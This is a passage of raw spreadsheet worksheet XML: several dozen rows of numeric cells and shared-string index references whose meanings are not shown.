        <v>8674.0</v>
      </c>
      <c r="B33781" s="2">
        <v>5.4381189E7</v>
      </c>
      <c r="C33781" s="2" t="s">
        <v>32518</v>
      </c>
      <c r="D33781" s="2">
        <v>1.0</v>
      </c>
      <c r="E33781" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33781" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33782" ht="15.75" customHeight="1">
      <c r="A33782" s="1">
        <v>8711.0</v>
      </c>
      <c r="B33782" s="2">
        <v>5.4454499E7</v>
      </c>
      <c r="C33782" s="2" t="s">
        <v>32519</v>
      </c>
      <c r="D33782" s="2">
        <v>1.0</v>
      </c>
      <c r="E33782" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33782" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33783" ht="15.75" customHeight="1">
      <c r="A33783" s="1">
        <v>8825.0</v>
      </c>
      <c r="B33783" s="2">
        <v>5.4649437E7</v>
      </c>
      <c r="C33783" s="2" t="s">
        <v>32520</v>
      </c>
      <c r="D33783" s="2">
        <v>1.0</v>
      </c>
      <c r="E33783" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33783" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33784" ht="15.75" customHeight="1">
      <c r="A33784" s="1">
        <v>8833.0</v>
      </c>
      <c r="B33784" s="2">
        <v>5.4657366E7</v>
      </c>
      <c r="C33784" s="2" t="s">
        <v>32521</v>
      </c>
      <c r="D33784" s="2">
        <v>1.0</v>
      </c>
      <c r="E33784" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33784" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33785" ht="15.75" customHeight="1">
      <c r="A33785" s="1">
        <v>8901.0</v>
      </c>
      <c r="B33785" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C33785" s="2" t="s">
        <v>32522</v>
      </c>
      <c r="D33785" s="2">
        <v>1.0</v>
      </c>
      <c r="E33785" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33785" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33786" ht="15.75" customHeight="1">
      <c r="A33786" s="1">
        <v>8936.0</v>
      </c>
      <c r="B33786" s="2">
        <v>5.4854593E7</v>
      </c>
      <c r="C33786" s="2" t="s">
        <v>32523</v>
      </c>
      <c r="D33786" s="2">
        <v>1.0</v>
      </c>
      <c r="E33786" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33786" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33787" ht="15.75" customHeight="1">
      <c r="A33787" s="1">
        <v>8937.0</v>
      </c>
      <c r="B33787" s="2">
        <v>5.4855306E7</v>
      </c>
      <c r="C33787" s="2" t="s">
        <v>32524</v>
      </c>
      <c r="D33787" s="2">
        <v>1.0</v>
      </c>
      <c r="E33787" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33787" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33788" ht="15.75" customHeight="1">
      <c r="A33788" s="1">
        <v>8991.0</v>
      </c>
      <c r="B33788" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C33788" s="2" t="s">
        <v>32525</v>
      </c>
      <c r="D33788" s="2">
        <v>1.0</v>
      </c>
      <c r="E33788" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33788" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33789" ht="15.75" customHeight="1">
      <c r="A33789" s="1">
        <v>9030.0</v>
      </c>
      <c r="B33789" s="2">
        <v>5.5035898E7</v>
      </c>
      <c r="C33789" s="2" t="s">
        <v>32526</v>
      </c>
      <c r="D33789" s="2">
        <v>1.0</v>
      </c>
      <c r="E33789" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33789" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33790" ht="15.75" customHeight="1">
      <c r="A33790" s="1">
        <v>9101.0</v>
      </c>
      <c r="B33790" s="2">
        <v>5.5163873E7</v>
      </c>
      <c r="C33790" s="2" t="s">
        <v>32527</v>
      </c>
      <c r="D33790" s="2">
        <v>1.0</v>
      </c>
      <c r="E33790" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33790" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33791" ht="15.75" customHeight="1">
      <c r="A33791" s="1">
        <v>9120.0</v>
      </c>
      <c r="B33791" s="2">
        <v>5.5216762E7</v>
      </c>
      <c r="C33791" s="2" t="s">
        <v>32528</v>
      </c>
      <c r="D33791" s="2">
        <v>1.0</v>
      </c>
      <c r="E33791" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33791" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33792" ht="15.75" customHeight="1">
      <c r="A33792" s="1">
        <v>9130.0</v>
      </c>
      <c r="B33792" s="2">
        <v>5.5229632E7</v>
      </c>
      <c r="C33792" s="2" t="s">
        <v>32529</v>
      </c>
      <c r="D33792" s="2">
        <v>1.0</v>
      </c>
      <c r="E33792" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33792" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33793" ht="15.75" customHeight="1">
      <c r="A33793" s="1">
        <v>9157.0</v>
      </c>
      <c r="B33793" s="2">
        <v>5.5282545E7</v>
      </c>
      <c r="C33793" s="2" t="s">
        <v>32530</v>
      </c>
      <c r="D33793" s="2">
        <v>1.0</v>
      </c>
      <c r="E33793" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33793" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33794" ht="15.75" customHeight="1">
      <c r="A33794" s="1">
        <v>9164.0</v>
      </c>
      <c r="B33794" s="2">
        <v>5.5308995E7</v>
      </c>
      <c r="C33794" s="2" t="s">
        <v>32531</v>
      </c>
      <c r="D33794" s="2">
        <v>1.0</v>
      </c>
      <c r="E33794" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33794" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33795" ht="15.75" customHeight="1">
      <c r="A33795" s="1">
        <v>9214.0</v>
      </c>
      <c r="B33795" s="2">
        <v>5.5428589E7</v>
      </c>
      <c r="C33795" s="2" t="s">
        <v>32532</v>
      </c>
      <c r="D33795" s="2">
        <v>1.0</v>
      </c>
      <c r="E33795" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33795" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33796" ht="15.75" customHeight="1">
      <c r="A33796" s="1">
        <v>9223.0</v>
      </c>
      <c r="B33796" s="2">
        <v>5.5434233E7</v>
      </c>
      <c r="C33796" s="2" t="s">
        <v>32533</v>
      </c>
      <c r="D33796" s="2">
        <v>1.0</v>
      </c>
      <c r="E33796" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33796" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33797" ht="15.75" customHeight="1">
      <c r="A33797" s="1">
        <v>9318.0</v>
      </c>
      <c r="B33797" s="2">
        <v>5.5579466E7</v>
      </c>
      <c r="C33797" s="2" t="s">
        <v>32534</v>
      </c>
      <c r="D33797" s="2">
        <v>1.0</v>
      </c>
      <c r="E33797" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33797" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33798" ht="15.75" customHeight="1">
      <c r="A33798" s="1">
        <v>9324.0</v>
      </c>
      <c r="B33798" s="2">
        <v>5.5584931E7</v>
      </c>
      <c r="C33798" s="2" t="s">
        <v>32535</v>
      </c>
      <c r="D33798" s="2">
        <v>1.0</v>
      </c>
      <c r="E33798" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33798" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33799" ht="15.75" customHeight="1">
      <c r="A33799" s="1">
        <v>9336.0</v>
      </c>
      <c r="B33799" s="2">
        <v>5.5635799E7</v>
      </c>
      <c r="C33799" s="2" t="s">
        <v>32536</v>
      </c>
      <c r="D33799" s="2">
        <v>1.0</v>
      </c>
      <c r="E33799" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33799" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33800" ht="15.75" customHeight="1">
      <c r="A33800" s="1">
        <v>9379.0</v>
      </c>
      <c r="B33800" s="2">
        <v>5.5723511E7</v>
      </c>
      <c r="C33800" s="2" t="s">
        <v>32537</v>
      </c>
      <c r="D33800" s="2">
        <v>1.0</v>
      </c>
      <c r="E33800" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33800" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33801" ht="15.75" customHeight="1">
      <c r="A33801" s="1">
        <v>9443.0</v>
      </c>
      <c r="B33801" s="2">
        <v>5.5816959E7</v>
      </c>
      <c r="C33801" s="2" t="s">
        <v>32538</v>
      </c>
      <c r="D33801" s="2">
        <v>1.0</v>
      </c>
      <c r="E33801" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33801" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33802" ht="15.75" customHeight="1">
      <c r="A33802" s="1">
        <v>9448.0</v>
      </c>
      <c r="B33802" s="2">
        <v>5.5818755E7</v>
      </c>
      <c r="C33802" s="2" t="s">
        <v>32539</v>
      </c>
      <c r="D33802" s="2">
        <v>1.0</v>
      </c>
      <c r="E33802" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33802" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33803" ht="15.75" customHeight="1">
      <c r="A33803" s="1">
        <v>9449.0</v>
      </c>
      <c r="B33803" s="2">
        <v>5.5818755E7</v>
      </c>
      <c r="C33803" s="2" t="s">
        <v>32540</v>
      </c>
      <c r="D33803" s="2">
        <v>1.0</v>
      </c>
      <c r="E33803" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33803" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33804" ht="15.75" customHeight="1">
      <c r="A33804" s="1">
        <v>9465.0</v>
      </c>
      <c r="B33804" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C33804" s="2" t="s">
        <v>32541</v>
      </c>
      <c r="D33804" s="2">
        <v>1.0</v>
      </c>
      <c r="E33804" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33804" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33805" ht="15.75" customHeight="1">
      <c r="A33805" s="1">
        <v>9490.0</v>
      </c>
      <c r="B33805" s="2">
        <v>5.5911979E7</v>
      </c>
      <c r="C33805" s="2" t="s">
        <v>32542</v>
      </c>
      <c r="D33805" s="2">
        <v>1.0</v>
      </c>
      <c r="E33805" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33805" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33806" ht="15.75" customHeight="1">
      <c r="A33806" s="1">
        <v>9531.0</v>
      </c>
      <c r="B33806" s="2">
        <v>5.5982911E7</v>
      </c>
      <c r="C33806" s="2" t="s">
        <v>32543</v>
      </c>
      <c r="D33806" s="2">
        <v>1.0</v>
      </c>
      <c r="E33806" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33806" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33807" ht="15.75" customHeight="1">
      <c r="A33807" s="1">
        <v>9537.0</v>
      </c>
      <c r="B33807" s="2">
        <v>5.5999638E7</v>
      </c>
      <c r="C33807" s="2" t="s">
        <v>32544</v>
      </c>
      <c r="D33807" s="2">
        <v>1.0</v>
      </c>
      <c r="E33807" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33807" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33808" ht="15.75" customHeight="1">
      <c r="A33808" s="1">
        <v>9569.0</v>
      </c>
      <c r="B33808" s="2">
        <v>5.605565E7</v>
      </c>
      <c r="C33808" s="2" t="s">
        <v>32545</v>
      </c>
      <c r="D33808" s="2">
        <v>1.0</v>
      </c>
      <c r="E33808" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33808" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33809" ht="15.75" customHeight="1">
      <c r="A33809" s="1">
        <v>9600.0</v>
      </c>
      <c r="B33809" s="2">
        <v>5.6140323E7</v>
      </c>
      <c r="C33809" s="2" t="s">
        <v>32546</v>
      </c>
      <c r="D33809" s="2">
        <v>1.0</v>
      </c>
      <c r="E33809" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33809" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33810" ht="15.75" customHeight="1">
      <c r="A33810" s="1">
        <v>9610.0</v>
      </c>
      <c r="B33810" s="2">
        <v>5.6172355E7</v>
      </c>
      <c r="C33810" s="2" t="s">
        <v>32547</v>
      </c>
      <c r="D33810" s="2">
        <v>1.0</v>
      </c>
      <c r="E33810" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33810" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33811" ht="15.75" customHeight="1">
      <c r="A33811" s="1">
        <v>9614.0</v>
      </c>
      <c r="B33811" s="2">
        <v>5.618475E7</v>
      </c>
      <c r="C33811" s="2" t="s">
        <v>32548</v>
      </c>
      <c r="D33811" s="2">
        <v>1.0</v>
      </c>
      <c r="E33811" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33811" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33812" ht="15.75" customHeight="1">
      <c r="A33812" s="1">
        <v>9630.0</v>
      </c>
      <c r="B33812" s="2">
        <v>5.6224102E7</v>
      </c>
      <c r="C33812" s="2" t="s">
        <v>32549</v>
      </c>
      <c r="D33812" s="2">
        <v>1.0</v>
      </c>
      <c r="E33812" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33812" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33813" ht="15.75" customHeight="1">
      <c r="A33813" s="1">
        <v>9653.0</v>
      </c>
      <c r="B33813" s="2">
        <v>5.6270238E7</v>
      </c>
      <c r="C33813" s="2" t="s">
        <v>32550</v>
      </c>
      <c r="D33813" s="2">
        <v>1.0</v>
      </c>
      <c r="E33813" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33813" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33814" ht="15.75" customHeight="1">
      <c r="A33814" s="1">
        <v>9685.0</v>
      </c>
      <c r="B33814" s="2">
        <v>5.6344144E7</v>
      </c>
      <c r="C33814" s="2" t="s">
        <v>32551</v>
      </c>
      <c r="D33814" s="2">
        <v>1.0</v>
      </c>
      <c r="E33814" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33814" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33815" ht="15.75" customHeight="1">
      <c r="A33815" s="1">
        <v>9742.0</v>
      </c>
      <c r="B33815" s="2">
        <v>5.6464865E7</v>
      </c>
      <c r="C33815" s="2" t="s">
        <v>32552</v>
      </c>
      <c r="D33815" s="2">
        <v>1.0</v>
      </c>
      <c r="E33815" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33815" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33816" ht="15.75" customHeight="1">
      <c r="A33816" s="1">
        <v>9743.0</v>
      </c>
      <c r="B33816" s="2">
        <v>5.6464865E7</v>
      </c>
      <c r="C33816" s="2" t="s">
        <v>32553</v>
      </c>
      <c r="D33816" s="2">
        <v>1.0</v>
      </c>
      <c r="E33816" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33816" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33817" ht="15.75" customHeight="1">
      <c r="A33817" s="1">
        <v>9795.0</v>
      </c>
      <c r="B33817" s="2">
        <v>5.6534684E7</v>
      </c>
      <c r="C33817" s="2" t="s">
        <v>32554</v>
      </c>
      <c r="D33817" s="2">
        <v>1.0</v>
      </c>
      <c r="E33817" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33817" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33818" ht="15.75" customHeight="1">
      <c r="A33818" s="1">
        <v>9836.0</v>
      </c>
      <c r="B33818" s="2">
        <v>5.6647243E7</v>
      </c>
      <c r="C33818" s="2" t="s">
        <v>32555</v>
      </c>
      <c r="D33818" s="2">
        <v>1.0</v>
      </c>
      <c r="E33818" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33818" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33819" ht="15.75" customHeight="1">
      <c r="A33819" s="1">
        <v>9854.0</v>
      </c>
      <c r="B33819" s="2">
        <v>5.6696428E7</v>
      </c>
      <c r="C33819" s="2" t="s">
        <v>32230</v>
      </c>
      <c r="D33819" s="2">
        <v>1.0</v>
      </c>
      <c r="E33819" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33819" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33820" ht="15.75" customHeight="1">
      <c r="A33820" s="1">
        <v>9855.0</v>
      </c>
      <c r="B33820" s="2">
        <v>5.6705291E7</v>
      </c>
      <c r="C33820" s="2" t="s">
        <v>32556</v>
      </c>
      <c r="D33820" s="2">
        <v>1.0</v>
      </c>
      <c r="E33820" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33820" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33821" ht="15.75" customHeight="1">
      <c r="A33821" s="1">
        <v>9857.0</v>
      </c>
      <c r="B33821" s="2">
        <v>5.6709687E7</v>
      </c>
      <c r="C33821" s="2" t="s">
        <v>32557</v>
      </c>
      <c r="D33821" s="2">
        <v>1.0</v>
      </c>
      <c r="E33821" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33821" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33822" ht="15.75" customHeight="1">
      <c r="A33822" s="1">
        <v>10026.0</v>
      </c>
      <c r="B33822" s="2">
        <v>5.7053362E7</v>
      </c>
      <c r="C33822" s="2" t="s">
        <v>32558</v>
      </c>
      <c r="D33822" s="2">
        <v>1.0</v>
      </c>
      <c r="E33822" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33822" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33823" ht="15.75" customHeight="1">
      <c r="A33823" s="1">
        <v>10054.0</v>
      </c>
      <c r="B33823" s="2">
        <v>5.7117336E7</v>
      </c>
      <c r="C33823" s="2" t="s">
        <v>32559</v>
      </c>
      <c r="D33823" s="2">
        <v>1.0</v>
      </c>
      <c r="E33823" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33823" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33824" ht="15.75" customHeight="1">
      <c r="A33824" s="1">
        <v>10070.0</v>
      </c>
      <c r="B33824" s="2">
        <v>5.7142626E7</v>
      </c>
      <c r="C33824" s="2" t="s">
        <v>32560</v>
      </c>
      <c r="D33824" s="2">
        <v>1.0</v>
      </c>
      <c r="E33824" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33824" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33825" ht="15.75" customHeight="1">
      <c r="A33825" s="1">
        <v>10072.0</v>
      </c>
      <c r="B33825" s="2">
        <v>5.7142626E7</v>
      </c>
      <c r="C33825" s="2" t="s">
        <v>32561</v>
      </c>
      <c r="D33825" s="2">
        <v>1.0</v>
      </c>
      <c r="E33825" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33825" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33826" ht="15.75" customHeight="1">
      <c r="A33826" s="1">
        <v>10108.0</v>
      </c>
      <c r="B33826" s="2">
        <v>5.7243449E7</v>
      </c>
      <c r="C33826" s="2" t="s">
        <v>32562</v>
      </c>
      <c r="D33826" s="2">
        <v>1.0</v>
      </c>
      <c r="E33826" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33826" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33827" ht="15.75" customHeight="1">
      <c r="A33827" s="1">
        <v>10182.0</v>
      </c>
      <c r="B33827" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C33827" s="2" t="s">
        <v>32563</v>
      </c>
      <c r="D33827" s="2">
        <v>1.0</v>
      </c>
      <c r="E33827" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33827" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33828" ht="15.75" customHeight="1">
      <c r="A33828" s="1">
        <v>10183.0</v>
      </c>
      <c r="B33828" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C33828" s="2" t="s">
        <v>32564</v>
      </c>
      <c r="D33828" s="2">
        <v>1.0</v>
      </c>
      <c r="E33828" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33828" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33829" ht="15.75" customHeight="1">
      <c r="A33829" s="1">
        <v>10196.0</v>
      </c>
      <c r="B33829" s="2">
        <v>5.7396121E7</v>
      </c>
      <c r="C33829" s="2" t="s">
        <v>32565</v>
      </c>
      <c r="D33829" s="2">
        <v>1.0</v>
      </c>
      <c r="E33829" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33829" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33830" ht="15.75" customHeight="1">
      <c r="A33830" s="1">
        <v>10203.0</v>
      </c>
      <c r="B33830" s="2">
        <v>5.7407363E7</v>
      </c>
      <c r="C33830" s="2" t="s">
        <v>32566</v>
      </c>
      <c r="D33830" s="2">
        <v>1.0</v>
      </c>
      <c r="E33830" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33830" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33831" ht="15.75" customHeight="1">
      <c r="A33831" s="1">
        <v>10219.0</v>
      </c>
      <c r="B33831" s="2">
        <v>5.7454641E7</v>
      </c>
      <c r="C33831" s="2" t="s">
        <v>32567</v>
      </c>
      <c r="D33831" s="2">
        <v>1.0</v>
      </c>
      <c r="E33831" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33831" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33832" ht="15.75" customHeight="1">
      <c r="A33832" s="1">
        <v>10260.0</v>
      </c>
      <c r="B33832" s="2">
        <v>5.7570586E7</v>
      </c>
      <c r="C33832" s="2" t="s">
        <v>32568</v>
      </c>
      <c r="D33832" s="2">
        <v>1.0</v>
      </c>
      <c r="E33832" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33832" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33833" ht="15.75" customHeight="1">
      <c r="A33833" s="1">
        <v>10287.0</v>
      </c>
      <c r="B33833" s="2">
        <v>5.7636265E7</v>
      </c>
      <c r="C33833" s="2" t="s">
        <v>32569</v>
      </c>
      <c r="D33833" s="2">
        <v>1.0</v>
      </c>
      <c r="E33833" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33833" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33834" ht="15.75" customHeight="1">
      <c r="A33834" s="1">
        <v>10296.0</v>
      </c>
      <c r="B33834" s="2">
        <v>5.7655026E7</v>
      </c>
      <c r="C33834" s="2" t="s">
        <v>32570</v>
      </c>
      <c r="D33834" s="2">
        <v>1.0</v>
      </c>
      <c r="E33834" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33834" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33835" ht="15.75" customHeight="1">
      <c r="A33835" s="1">
        <v>10298.0</v>
      </c>
      <c r="B33835" s="2">
        <v>5.7655026E7</v>
      </c>
      <c r="C33835" s="2" t="s">
        <v>32571</v>
      </c>
      <c r="D33835" s="2">
        <v>1.0</v>
      </c>
      <c r="E33835" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33835" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33836" ht="15.75" customHeight="1">
      <c r="A33836" s="1">
        <v>10313.0</v>
      </c>
      <c r="B33836" s="2">
        <v>5.7673231E7</v>
      </c>
      <c r="C33836" s="2" t="s">
        <v>32572</v>
      </c>
      <c r="D33836" s="2">
        <v>1.0</v>
      </c>
      <c r="E33836" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33836" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33837" ht="15.75" customHeight="1">
      <c r="A33837" s="1">
        <v>10346.0</v>
      </c>
      <c r="B33837" s="2">
        <v>5.7735163E7</v>
      </c>
      <c r="C33837" s="2" t="s">
        <v>32573</v>
      </c>
      <c r="D33837" s="2">
        <v>1.0</v>
      </c>
      <c r="E33837" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33837" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33838" ht="15.75" customHeight="1">
      <c r="A33838" s="1">
        <v>10407.0</v>
      </c>
      <c r="B33838" s="2">
        <v>9696486.0</v>
      </c>
      <c r="C33838" s="2" t="s">
        <v>32574</v>
      </c>
      <c r="D33838" s="2">
        <v>1.0</v>
      </c>
      <c r="E33838" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33838" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33839" ht="15.75" customHeight="1">
      <c r="A33839" s="1">
        <v>10479.0</v>
      </c>
      <c r="B33839" s="2">
        <v>1.0905298E7</v>
      </c>
      <c r="C33839" s="2" t="s">
        <v>32575</v>
      </c>
      <c r="D33839" s="2">
        <v>1.0</v>
      </c>
      <c r="E33839" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33839" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33840" ht="15.75" customHeight="1">
      <c r="A33840" s="1">
        <v>10481.0</v>
      </c>
      <c r="B33840" s="2">
        <v>1.0936601E7</v>
      </c>
      <c r="C33840" s="2" t="s">
        <v>32576</v>
      </c>
      <c r="D33840" s="2">
        <v>1.0</v>
      </c>
      <c r="E33840" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33840" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33841" ht="15.75" customHeight="1">
      <c r="A33841" s="1">
        <v>10536.0</v>
      </c>
      <c r="B33841" s="2">
        <v>1.2360052E7</v>
      </c>
      <c r="C33841" s="2" t="s">
        <v>32577</v>
      </c>
      <c r="D33841" s="2">
        <v>1.0</v>
      </c>
      <c r="E33841" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33841" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33842" ht="15.75" customHeight="1">
      <c r="A33842" s="1">
        <v>10673.0</v>
      </c>
      <c r="B33842" s="2">
        <v>1.453134E7</v>
      </c>
      <c r="C33842" s="2" t="s">
        <v>32578</v>
      </c>
      <c r="D33842" s="2">
        <v>1.0</v>
      </c>
      <c r="E33842" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33842" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33843" ht="15.75" customHeight="1">
      <c r="A33843" s="1">
        <v>10688.0</v>
      </c>
      <c r="B33843" s="2">
        <v>1.4710974E7</v>
      </c>
      <c r="C33843" s="2" t="s">
        <v>32579</v>
      </c>
      <c r="D33843" s="2">
        <v>1.0</v>
      </c>
      <c r="E33843" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33843" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33844" ht="15.75" customHeight="1">
      <c r="A33844" s="1">
        <v>10744.0</v>
      </c>
      <c r="B33844" s="2">
        <v>1.5455458E7</v>
      </c>
      <c r="C33844" s="2" t="s">
        <v>32580</v>
      </c>
      <c r="D33844" s="2">
        <v>1.0</v>
      </c>
      <c r="E33844" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33844" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33845" ht="15.75" customHeight="1">
      <c r="A33845" s="1">
        <v>10791.0</v>
      </c>
      <c r="B33845" s="2">
        <v>1.571245E7</v>
      </c>
      <c r="C33845" s="2" t="s">
        <v>32581</v>
      </c>
      <c r="D33845" s="2">
        <v>1.0</v>
      </c>
      <c r="E33845" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33845" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33846" ht="15.75" customHeight="1">
      <c r="A33846" s="1">
        <v>10804.0</v>
      </c>
      <c r="B33846" s="2">
        <v>1.5827938E7</v>
      </c>
      <c r="C33846" s="2" t="s">
        <v>32582</v>
      </c>
      <c r="D33846" s="2">
        <v>1.0</v>
      </c>
      <c r="E33846" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33846" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33847" ht="15.75" customHeight="1">
      <c r="A33847" s="1">
        <v>10866.0</v>
      </c>
      <c r="B33847" s="2">
        <v>1.6394283E7</v>
      </c>
      <c r="C33847" s="2" t="s">
        <v>32583</v>
      </c>
      <c r="D33847" s="2">
        <v>1.0</v>
      </c>
      <c r="E33847" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33847" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33848" ht="15.75" customHeight="1">
